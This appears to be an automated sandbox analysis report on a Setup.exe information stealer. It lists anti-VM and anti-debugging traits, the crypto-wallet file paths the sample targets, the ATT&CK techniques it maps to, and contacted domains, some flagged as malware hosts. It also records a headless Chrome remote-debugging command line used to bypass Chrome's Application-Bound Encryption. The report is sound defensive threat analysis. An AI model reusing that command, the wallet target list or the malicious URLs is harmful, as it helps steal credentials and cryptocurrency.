      Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Setup.exe, 00000000.00000003.1807976102.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: chrome.exe, 00000002.00000002.3535742311.000001C7C87AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: Amcache.hve.7.drBinary or memory string: vmci.sys
      Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: chrome.exe, 00000002.00000002.3538585204.000001C7CEDD0000.00000002.00000001.00040000.0000000F.sdmp, chrome.exe, 00000002.00000003.2084427828.0000650801404000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ~]lx{tn~lzyqeMu{_tvwpd
      Source: Amcache.hve.7.drBinary or memory string: VMware20,1
      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: chrome.exe, 00000002.00000002.3546413895.0000650800B90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=086384ee-2905-4eea-8d44-73f7532592bd
      Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031CBEAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_031CBEAD
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20367 mov edx, dword ptr fs:[00000030h]0_2_02D20367
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20927 mov eax, dword ptr fs:[00000030h]0_2_02D20927
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D589B4 mov eax, dword ptr fs:[00000030h]0_2_02D589B4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20F76 mov eax, dword ptr fs:[00000030h]0_2_02D20F76
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20F77 mov eax, dword ptr fs:[00000030h]0_2_02D20F77
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20CD7 mov eax, dword ptr fs:[00000030h]0_2_02D20CD7
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A71D0 mov eax, dword ptr fs:[00000030h]0_2_031A71D0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0317A250 GetProcessHeap,RtlAllocateHeap,RtlReAllocateHeap,GetLastError,HeapFree,0_2_0317A250
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A803E SetUnhandledExceptionFilter,0_2_031A803E
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A7439 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_031A7439
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031CBEAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_031CBEAD
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A7EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_031A7EE1

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6592, type: MEMORYSTR
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_031DC305
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,0_2_031D4210
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,0_2_031DC22F
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_031DC129
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,0_2_031DC000
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoEx,0_2_031BEE33
      Source: C:\Users\user\Desktop\Setup.exeCode function: EnumSystemLocalesW,0_2_031DBD0D
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_031DBDA0
      Source: C:\Users\user\Desktop\Setup.exeCode function: EnumSystemLocalesW,0_2_031DBC27
      Source: C:\Users\user\Desktop\Setup.exeCode function: EnumSystemLocalesW,0_2_031DBC72
      Source: C:\Users\user\Desktop\Setup.exeCode function: EnumSystemLocalesW,0_2_031D3C8D
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A80F5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_031A80F5
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031D4F52 GetTimeZoneInformation,0_2_031D4F52
      Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Found many strings related to Crypto-Wallets (likely being stolen)
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Electrum\wallets
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\ElectronCash\wallets
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","info.seco"],
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aming\Exodus
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Ethereum
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Coinomi\Coinomi\wallets
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Roaming\Ledger Live
      Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6592, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Attempt to bypass Chrome Application-Bound Encryption
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		1
      Process Injection      		1
      Masquerading      		OS Credential Dumping2
      System Time Discovery      		Remote Services1
      Archive Collected Data      		21
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Query Registry      		Remote Desktop Protocol1
      Data from Local System      		1
      Remote Access Software      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Process Injection      		Security Account Manager41
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared Drive2
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets2
      Process Discovery      		SSHKeylogging4
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials1
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Setup.exe5%ReversingLabs

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://klippetamea8.shop/NAURGGBG953NT9QEQBG3.binS0%Avira URL Cloudsafe
      https://ras2.shop0%Avira URL Cloudsafe
      http://anglebug.com/6755:0%Avira URL Cloudsafe
      https://ras2.shop/Up0%Avira URL Cloudsafe
      https://klipcatepiu0.shop/int_clp_ldr_sha.txtmp100%Avira URL Cloudmalware
      https://klipcatepiu0.shop/int_clp_ldr_sha.txt100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      steamcommunity.com
      		104.121.10.34
      		truefalse
        		high
        plus.l.google.com
        		142.250.181.78
        		truefalse
          		high
          play.google.com
          		172.217.19.206
          		truefalse
            		high
            www.google.com
            		172.217.21.36
            		truefalse
              		high
              ras2.shop
              		104.21.2.114
              		truetrue
                		unknown
                apis.google.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://steamcommunity.com/profiles/76561199680660089false
                    		high
                    https://ras2.shop/Uptrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://dl.google.com/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemdgkjcchrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545025285.000065080089C000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://google-ohttp-relay-join.fastly-edge.com/(kchrome.exe, 00000002.00000003.1875835089.00007DA000690000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/ac/?q=chrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://klipcatepiu0.shop/int_clp_ldr_sha.txtSetup.exe, 00000000.00000002.2769540945.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1848956671.0000000003BF2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                              		high
                              http://dl.google.com/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindggfcjichrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://ras2.shopSetup.exe, 00000000.00000003.1807816623.0000000000B81000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830198421.0000000000B81000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000B81000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000002.00000002.3544959461.0000650800878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3549513925.0000650801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543332924.00006508004F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://anglebug.com/4633chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/chrome/tips/gsOpenchrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://anglebug.com/7382chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control:chrome.exe, 00000002.00000002.3553888972.000065080271E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://issuetracker.google.com/284462263chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546747717.0000650800C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.gstatic.cn/recaptcha/Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000002.00000002.3544674309.00006508007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544572535.0000650800788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpnchrome.exe, 00000002.00000002.3543854065.0000650800638000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://polymer.github.io/AUTHORS.txtchrome.exe, 00000002.00000002.3542362273.00006508002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887219651.0000650800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888049278.00006508010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887772313.00006508010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888463880.0000650800F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889128782.000065080120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887848412.0000650800F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887601115.0000650801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888826743.000065080040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888485035.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888519543.0000650800F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888423202.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889004039.00006508010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.valvesoftware.com/legal.htmSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                          		high
                                                          https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.youtube.comSetup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://steamcommunity.com/prSetup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://anglebug.com/6755:chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000002.00000002.3545483481.00006508009C7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545415544.000065080098C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://anglebug.com/7714chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://unisolated.invalid/chrome.exe, 00000002.00000002.3545518029.00006508009D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000002.00000003.1889128782.000065080120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888826743.000065080040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889004039.00006508010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.remobjects.com/psSetup.exe, 00000000.00000000.1676596089.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                          		high
                                                                          https://steamcommunity.com/profiles/76561199680660089barniunknownfSetup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/chrome/tips/chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545335468.0000650800960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544926795.0000650800868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                		high
                                                                                http://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanchrome.exe, 00000002.00000002.3543854065.0000650800638000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.innosetup.com/Setup.exe, 00000000.00000000.1676596089.0000000000401000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                      		high
                                                                                      http://anglebug.com/6248chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000002.00000003.1922929258.000065080300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922510832.0000650803084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922793205.0000650801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922659890.0000650803030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://anglebug.com/3586;chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://anglebug.com/6929chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                                  		high
                                                                                                  https://s.ytimg.com;Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
